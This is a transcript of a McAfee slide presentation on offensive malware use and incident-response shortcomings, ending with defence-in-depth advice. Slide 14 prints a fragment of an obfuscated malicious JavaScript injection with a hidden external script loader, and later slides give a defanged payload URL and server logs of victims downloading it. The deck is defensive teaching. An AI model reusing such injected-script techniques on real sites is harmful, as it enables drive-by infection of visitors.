Offensive malware usage and defense
-
Upload
christiaan-beek -
Category
Technology
-
view
3.567 -
download
0
description
Transcript of Offensive malware usage and defense
![Page 1: Offensive malware usage and defense](https://reader034.fdocuments.net/reader034/viewer/2022042714/55635ecbd8b42a2f508b4c9a/html5/thumbnails/1.jpg)
Malware Offensive usage and how to defend
Christiaan Beek
McAfee Professional Services
![Page 2: Offensive malware usage and defense](https://reader034.fdocuments.net/reader034/viewer/2022042714/55635ecbd8b42a2f508b4c9a/html5/thumbnails/2.jpg)
Agenda
• $whoami
• Examples
• Offensive ways of using malware
• What goes wrong
• Defense recommendations
• Final thoughts
![Page 3: Offensive malware usage and defense](https://reader034.fdocuments.net/reader034/viewer/2022042714/55635ecbd8b42a2f508b4c9a/html5/thumbnails/3.jpg)
> whoami
• Christiaan Beek
• Practice lead IR & Forensics EMEA
• Developer/Instructor MFIRE
• Training CERTS
![Page 4: Offensive malware usage and defense](https://reader034.fdocuments.net/reader034/viewer/2022042714/55635ecbd8b42a2f508b4c9a/html5/thumbnails/4.jpg)
A Little Background
Foundstone Services – McAfee Strategic Security
![Page 5: Offensive malware usage and defense](https://reader034.fdocuments.net/reader034/viewer/2022042714/55635ecbd8b42a2f508b4c9a/html5/thumbnails/5.jpg)
OFFENSE
![Page 6: Offensive malware usage and defense](https://reader034.fdocuments.net/reader034/viewer/2022042714/55635ecbd8b42a2f508b4c9a/html5/thumbnails/6.jpg)
Offensive usage of malware
ENERGY & INFRA Financial MEDICAL
MOBILE Defense
![Page 7: Offensive malware usage and defense](https://reader034.fdocuments.net/reader034/viewer/2022042714/55635ecbd8b42a2f508b4c9a/html5/thumbnails/7.jpg)
Offensive usage of malware
Why malware?
• low profile during preparation
• many options to spread / infect
• many ways to hide
• self destruct mechanism
• many ways to transfer data to
![Page 8: Offensive malware usage and defense](https://reader034.fdocuments.net/reader034/viewer/2022042714/55635ecbd8b42a2f508b4c9a/html5/thumbnails/8.jpg)
Offensive usage of malware
• More and more discovery of malware frameworks
• Multiple modules /components
• Written by pro’s – sponsored by nations
![Page 9: Offensive malware usage and defense](https://reader034.fdocuments.net/reader034/viewer/2022042714/55635ecbd8b42a2f508b4c9a/html5/thumbnails/9.jpg)
Offensive - What’s Different?
Development Delivery Detection Command & Control Intent
• Nation-States
• Truly
customized
payloads
• Zero day
propagation
• Multi-vectored:
Blue tooth,
USB, network
• Digitally signed
with
compromised
certificates
• Outbound ex-
filtration
masking
• Central
command
• Modular
payloads
• Surveillance
• Disrupt /
Destroy
![Page 10: Offensive malware usage and defense](https://reader034.fdocuments.net/reader034/viewer/2022042714/55635ecbd8b42a2f508b4c9a/html5/thumbnails/10.jpg)
Stages of an attack:
![Page 11: Offensive malware usage and defense](https://reader034.fdocuments.net/reader034/viewer/2022042714/55635ecbd8b42a2f508b4c9a/html5/thumbnails/11.jpg)
Stages of an attack:
![Page 12: Offensive malware usage and defense](https://reader034.fdocuments.net/reader034/viewer/2022042714/55635ecbd8b42a2f508b4c9a/html5/thumbnails/12.jpg)
Stages of an attack:
![Page 13: Offensive malware usage and defense](https://reader034.fdocuments.net/reader034/viewer/2022042714/55635ecbd8b42a2f508b4c9a/html5/thumbnails/13.jpg)
Stages of an attack:
![Page 14: Offensive malware usage and defense](https://reader034.fdocuments.net/reader034/viewer/2022042714/55635ecbd8b42a2f508b4c9a/html5/thumbnails/14.jpg)
Stages of an attack – first script
script type="text/javascript" src="swfobject.js"></script>
<script src=jpg.js></script>
<script type="text/javascript">
if(document.cookie.indexOf("DCHJEik8=")==-1 && hiOC2.indexOf("linux")<=-1 && hiOC2.indexOf("bot")==-1 &&
hiOC2.indexOf("spider")==-1)
var jMJFRp3=deconcept.SWFObjectUtil.getPlayerVersion();
var expires=new Date();
expires.setTime(expires.getTime()+1*60*60*1000);
document.cookie="DCHJEik8=Yes;path=/;expires="+expires.toGMTString();
for(WdkimKX2=0,gNRb4=true,sAgnGw8=["msie","firefox","opera"];gNRb4;WdkimKX2++){gNRb4=gNRb4 &&
(navigator.userAgent.toLowerCase().indexOf(sAgnGw8[WdkimKX2])>-1);if(WdkimKX2==sAgnGw8.length-
1)WdkimKX2=-1;}Hwqq6="0";delete Hwqq6;try{Hwqq6+="0"+"0";}catch(e){yltBe1=unescape;mYSdOxl6 =
eval;}CwefLf0=“S1+ADphS1(hmacmx8)))^MqiovxR7);}try{new function(){EmIcO0(EJiD6);}}catch(e){try{new
function(){Qkrnq6=parseInt;vKFaTPR4(EJiD6);}}catch(e)
}
</script>
<DIV style="VISIBILITY: hidden; WIDTH: 0px; HEIGHT: 0px"><script language="javascript"
src="hxxp://count2.51yes……….. 31931&logo=12" charset="gb2312"></script></DIV>
![Page 15: Offensive malware usage and defense](https://reader034.fdocuments.net/reader034/viewer/2022042714/55635ecbd8b42a2f508b4c9a/html5/thumbnails/15.jpg)
Final destination?:
hxxp://222.7x.xx.xx.xx/x.exe
![Page 16: Offensive malware usage and defense](https://reader034.fdocuments.net/reader034/viewer/2022042714/55635ecbd8b42a2f508b4c9a/html5/thumbnails/16.jpg)
Inner working?
![Page 17: Offensive malware usage and defense](https://reader034.fdocuments.net/reader034/viewer/2022042714/55635ecbd8b42a2f508b4c9a/html5/thumbnails/17.jpg)
IIS logs on hacked ‘landing’ server:
9/23/2012 4:06:16 70.49.x.x W3SVC1 80 GET /x.exe
9/23/2012 4:07:46 99.23.x.x W3SVC1 80 GET /x.exe
9/23/2012 4:08:25 93.80.x.x W3SVC1 80 GET /x.exe
9/23/2012 4:14:48 208.91.x.x W3SVC1 80 GET /x.exe
9/23/2012 4:36:05 95.27.x.x W3SVC1 80 GET /pay/x.exe
9/23/2012 5:15:23 208.91.x.x W3SVC1 80 GET /x.exe
9/23/2012 5:29:27 74.125.x.x W3SVC1 80 GET /x.exe
Dial 80 Or 443
![Page 18: Offensive malware usage and defense](https://reader034.fdocuments.net/reader034/viewer/2022042714/55635ecbd8b42a2f508b4c9a/html5/thumbnails/18.jpg)
War story
![Page 19: Offensive malware usage and defense](https://reader034.fdocuments.net/reader034/viewer/2022042714/55635ecbd8b42a2f508b4c9a/html5/thumbnails/19.jpg)
Future usage of malware
![Page 20: Offensive malware usage and defense](https://reader034.fdocuments.net/reader034/viewer/2022042714/55635ecbd8b42a2f508b4c9a/html5/thumbnails/20.jpg)
Future scenario’s
![Page 21: Offensive malware usage and defense](https://reader034.fdocuments.net/reader034/viewer/2022042714/55635ecbd8b42a2f508b4c9a/html5/thumbnails/21.jpg)
Future scenario’s or real...?
![Page 22: Offensive malware usage and defense](https://reader034.fdocuments.net/reader034/viewer/2022042714/55635ecbd8b42a2f508b4c9a/html5/thumbnails/22.jpg)
Future scenario’s
![Page 23: Offensive malware usage and defense](https://reader034.fdocuments.net/reader034/viewer/2022042714/55635ecbd8b42a2f508b4c9a/html5/thumbnails/23.jpg)
Future scenario’s
![Page 24: Offensive malware usage and defense](https://reader034.fdocuments.net/reader034/viewer/2022042714/55635ecbd8b42a2f508b4c9a/html5/thumbnails/24.jpg)
Future scenario’s
![Page 25: Offensive malware usage and defense](https://reader034.fdocuments.net/reader034/viewer/2022042714/55635ecbd8b42a2f508b4c9a/html5/thumbnails/25.jpg)
Future scenario’s
![Page 26: Offensive malware usage and defense](https://reader034.fdocuments.net/reader034/viewer/2022042714/55635ecbd8b42a2f508b4c9a/html5/thumbnails/26.jpg)
Future scenario’s
![Page 27: Offensive malware usage and defense](https://reader034.fdocuments.net/reader034/viewer/2022042714/55635ecbd8b42a2f508b4c9a/html5/thumbnails/27.jpg)
Future scenario’s
![Page 28: Offensive malware usage and defense](https://reader034.fdocuments.net/reader034/viewer/2022042714/55635ecbd8b42a2f508b4c9a/html5/thumbnails/28.jpg)
An Intel company
What goes wrong regarding Defense?
![Page 29: Offensive malware usage and defense](https://reader034.fdocuments.net/reader034/viewer/2022042714/55635ecbd8b42a2f508b4c9a/html5/thumbnails/29.jpg)
An Intel company
Problem #1
Many solutions but how to use them?
Forensic Readiness?
![Page 30: Offensive malware usage and defense](https://reader034.fdocuments.net/reader034/viewer/2022042714/55635ecbd8b42a2f508b4c9a/html5/thumbnails/30.jpg)
An Intel company
Problem #2
No visibility on the network
No correlation of events
![Page 31: Offensive malware usage and defense](https://reader034.fdocuments.net/reader034/viewer/2022042714/55635ecbd8b42a2f508b4c9a/html5/thumbnails/31.jpg)
An Intel company
Problem #3
Lack of skilled,
experienced and
dedicated people
![Page 32: Offensive malware usage and defense](https://reader034.fdocuments.net/reader034/viewer/2022042714/55635ecbd8b42a2f508b4c9a/html5/thumbnails/32.jpg)
An Intel company
Problem #4
No Incident Response procedures
No Dry-run exercise
![Page 33: Offensive malware usage and defense](https://reader034.fdocuments.net/reader034/viewer/2022042714/55635ecbd8b42a2f508b4c9a/html5/thumbnails/33.jpg)
An Intel company
Problem #5
The attack came
from…..
![Page 34: Offensive malware usage and defense](https://reader034.fdocuments.net/reader034/viewer/2022042714/55635ecbd8b42a2f508b4c9a/html5/thumbnails/34.jpg)
An Intel company
Problem #6
Destroying evidence
![Page 35: Offensive malware usage and defense](https://reader034.fdocuments.net/reader034/viewer/2022042714/55635ecbd8b42a2f508b4c9a/html5/thumbnails/35.jpg)
An Intel company
Problem #7
who is the system owner?
who will take action?
who is allowed to take
decisions?
![Page 36: Offensive malware usage and defense](https://reader034.fdocuments.net/reader034/viewer/2022042714/55635ecbd8b42a2f508b4c9a/html5/thumbnails/36.jpg)
An Intel company
Defense Strategies
![Page 37: Offensive malware usage and defense](https://reader034.fdocuments.net/reader034/viewer/2022042714/55635ecbd8b42a2f508b4c9a/html5/thumbnails/37.jpg)
The Big “Threat” Picture
All Threats All Known
Threats
Threats
AntiVirus
Sees
Threats
AntiVirus
Protects
Core
![Page 38: Offensive malware usage and defense](https://reader034.fdocuments.net/reader034/viewer/2022042714/55635ecbd8b42a2f508b4c9a/html5/thumbnails/38.jpg)
The “Core” Security Problem
• “Unauthorized” Execution
– Payload/attachment/link
– Network
– Privilege
• “Authorized” Execution
– Insiders misuse of privilege
End Users = Data
Identity
Thieves Spammers
Tool
Developers
Vulnerability
Discoverers
Malware Developers
100101010010110
Bot Herder
![Page 39: Offensive malware usage and defense](https://reader034.fdocuments.net/reader034/viewer/2022042714/55635ecbd8b42a2f508b4c9a/html5/thumbnails/39.jpg)
Defense-in-depth
![Page 40: Offensive malware usage and defense](https://reader034.fdocuments.net/reader034/viewer/2022042714/55635ecbd8b42a2f508b4c9a/html5/thumbnails/40.jpg)
Worthless without:
![Page 41: Offensive malware usage and defense](https://reader034.fdocuments.net/reader034/viewer/2022042714/55635ecbd8b42a2f508b4c9a/html5/thumbnails/41.jpg)
An Intel company
Final thoughts......
- Incidents happen
- Is forensic & malware readiness on your agenda?
- What needs to be changed in your process?
- Is your {army-unit/company/agency/etc} prepared?
- Did you separate critical infrastructures?
- Can we help you?
![Page 42: Offensive malware usage and defense](https://reader034.fdocuments.net/reader034/viewer/2022042714/55635ecbd8b42a2f508b4c9a/html5/thumbnails/42.jpg)
An Intel company
Thank you!
Keep in touch:
Email: Christiaan_Beek@McAfee dot com
Twitter: @FSEMEA @Foundstone @ChristaanBeek